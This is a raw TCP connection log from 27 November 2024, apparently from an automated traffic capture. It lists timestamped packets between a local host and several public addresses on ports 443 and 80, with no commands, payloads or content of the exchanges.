                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.619357109 CET4434976813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.619412899 CET49768443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.684750080 CET49765443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.694550037 CET49765443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.694560051 CET4434976513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.695504904 CET49765443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.695511103 CET4434976513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.713423014 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.713468075 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.713534117 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.713849068 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.713865042 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.716454029 CET49768443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.716481924 CET4434976813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.716491938 CET49768443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.716496944 CET4434976813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.751454115 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.751539946 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.751583099 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.843482971 CET49770443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.843549013 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.843609095 CET49770443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.876004934 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.876024961 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.876044035 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.876051903 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.879041910 CET49771443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.879091978 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.879154921 CET49771443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.935982943 CET49770443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.936019897 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.951394081 CET49771443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.951420069 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.952641964 CET49772443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.952667952 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.952721119 CET49772443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.952873945 CET49772443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.952887058 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.025552034 CET4434976513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.025619030 CET4434976513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.025666952 CET49765443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.026545048 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.026575089 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.026632071 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.027548075 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.027560949 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.128613949 CET49765443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.128643036 CET4434976513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.128657103 CET49765443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.128663063 CET4434976513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.253572941 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.253616095 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.253676891 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.298427105 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.298449039 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.621102095 CET49781443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.621139050 CET4434978194.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.621372938 CET49781443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.691209078 CET49782443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.691241980 CET4434978294.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.691332102 CET49782443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.922452927 CET8049755185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.922509909 CET4975580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.190653086 CET49782443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.190675974 CET4434978294.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.191015005 CET49781443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.191045046 CET4434978194.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.561606884 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.642644882 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.642698050 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.643100977 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.643106937 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.666064978 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.674669981 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.674681902 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.676281929 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.676372051 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.690963984 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.691257954 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.691529989 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.691545010 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.739813089 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.755625010 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.761271000 CET49770443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.761305094 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.763350964 CET49770443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.763356924 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.764872074 CET49772443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.764893055 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.765405893 CET49772443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.765410900 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.781330109 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.803411961 CET4975580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.804192066 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.809432983 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.810327053 CET49771443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.810362101 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.810759068 CET49771443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.810765028 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.923388958 CET8049755185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.924098969 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.924187899 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.958857059 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.996345043 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.996414900 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.996469975 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.078723907 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.079056025 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.175199986 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.175285101 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.175358057 CET49770443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.184456110 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.191690922 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.191766977 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.191843033 CET49772443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.254575014 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.254648924 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.254714966 CET49771443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.393841028 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.393841028 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.393882036 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.393893957 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.394608974 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.394628048 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.394674063 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.394686937 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.394731045 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.409343958 CET49772443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.409343958 CET49772443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.409389019 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.409400940 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.409413099 CET49771443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.409425020 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.409457922 CET49771443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.409465075 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.425542116 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.425553083 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.425578117 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.425602913 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.425638914 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.438715935 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.438750029 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.439223051 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.439228058 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.439969063 CET49770443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.439996958 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.440011024 CET49770443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.440017939 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.442209959 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.442265987 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.561733961 CET49786443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.561778069 CET4434978620.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.561847925 CET49786443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.563700914 CET49786443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.563713074 CET4434978620.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.607491016 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.607506990 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.607558966 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.607573032 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.638691902 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.638771057 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.638782024 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.659538984 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.659548044 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.659596920 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.659607887 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.675421953 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.675431013 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.675466061 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.675491095 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.675504923 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.675507069 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.675514936 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.764789104 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.764853001 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.764906883 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.798746109 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.798758984 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.798811913 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.798826933 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.798866987 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.803009987 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.803066969 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.803077936 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.803142071 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.803189993 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.803363085 CET49773443192.168.2.713.107.43.16
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.803385973 CET4434977313.107.43.16192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.817126036 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.817126036 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.817162991 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.817193985 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.839032888 CET49791443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.839097023 CET4434979113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.839196920 CET49791443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.844141960 CET49791443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.844192982 CET4434979113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.845633030 CET49792443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.845698118 CET4434979213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.845824003 CET49792443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.846056938 CET49792443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.846070051 CET4434979213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.846070051 CET49793443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.846096992 CET4434979313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.846163988 CET49793443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.848654985 CET49793443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.848674059 CET4434979313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.850279093 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.850301027 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.850378990 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.850778103 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.850790024 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.863972902 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.864006996 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.864085913 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.874737024 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.874782085 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.935585022 CET4434978294.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.936037064 CET49782443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.936045885 CET4434978294.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.937082052 CET4434978294.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.937138081 CET49782443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.940597057 CET49782443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.940670013 CET4434978294.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.940853119 CET49782443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.940859079 CET4434978294.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.981468916 CET49782443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.993467093 CET4434978194.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.993983984 CET49781443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.994012117 CET4434978194.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.997484922 CET4434978194.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.997556925 CET49781443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.998363018 CET49781443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.998451948 CET4434978194.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.120326042 CET49781443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.120345116 CET4434978194.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.141931057 CET49797443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.141987085 CET44349797172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.142047882 CET49797443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.142591000 CET49797443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.142610073 CET44349797172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.306431055 CET49781443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.434792042 CET4434978294.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.434878111 CET4434978294.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.435069084 CET49782443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.436467886 CET49782443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.436484098 CET4434978294.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.775926113 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.775980949 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.928060055 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.048661947 CET8049785185.215.113.206192.168.2.7
